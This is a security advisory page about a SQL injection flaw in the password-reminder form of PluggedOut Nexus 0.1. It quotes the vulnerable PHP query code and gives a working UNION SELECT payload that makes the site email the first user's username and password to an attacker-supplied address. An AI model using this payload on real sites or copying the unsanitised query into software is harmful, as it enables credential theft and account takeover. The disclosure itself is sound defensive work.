|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 536 CVE : CVE-2006-1081 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Hamid Ebadi Published : 05.03.2006
Advisory Content : PluggedOut Nexus SQL injection Nexus is an open source script you can run on your web server to give you a community based website where people can register, search each others interests, and communicate with one another either through a private messaging system, or via chat requests and forums. Project : PluggedOut Nexus Version : 0.1 Author : Jonathan Beckett Home : http://www.pluggedout.com Credit: The information has been provided by Hamid Ebadi . ( Hamid Network Security Team): admin[AT]hamid[o]ir The original article can be found at: http://hamid.ir/security/ Vulnerable Systems:PluggedOut Nexus 0.1 http://localhost/Nexus/forgotten_password.php in this address If you fill the private email address that you used while creating your account into the form , the server will send you an email to that address with your login details Input passed to the "email" parameter in "forgotten_password.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. test: in E-Mail Address form enter ' and press Send Request you will redirect to http://localhost/Nexus/site_problem.php and see : Problem with Nexus website A problem has occurred with the Nexus website - this was not your fault, and the administrators probably already know about it. Vulnerable Code: The following lines in "forgotten_password.php" : ---------------------------~=[Vulnerable Code]=~--------------------------- if ($_POST["submit"]!=""){ $con = db_connect(); $sql = "SELECT cUsername,cPassword,cEMailPrivate FROM nexus_users WHERE cEMailPrivate='".$_POST["email"]."'"; $result = mysql_query($sql,$con); if ($result!=false){ if (mysql_num_rows($result)>0){ $row = mysql_fetch_array($result); $from = $site_admin_email; $to = $row["cEMailPrivate"]; $subject = "Reminder Username/Password from ".$site_long_name.""; $body = "This email has been sent following a request for a reminder username/password in the ".$site_long_name." website.nn" ."Your account details are as follows;n" ." Username : ".$row["cUsername"]."n" ." Password : ".$row["cPassword"]."nn" ."If you did not request this reminder message, please contact the ".$site_long_name." administrator (".$admin_email.")n"; send_email($from,$to,$subject,$body); ---------------------------~=[/Vulnerable Code]=~--------------------------- exploit: insert this code in E-Mail Address form (http://localhost/Nexus/forgotten_password.php) : hamidnetworksecurityteam' union select cUsername,cPassword,'ATTACKER (at) EMAIL (dot) ADDR [email concealed]ESS' from nexus_users WHERE nUserId=1 and '1'='1 and ATTACKER (at) EMAIL (dot) ADDR [email concealed]ESS recieve email contain username & password for userID=1 . Signature  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |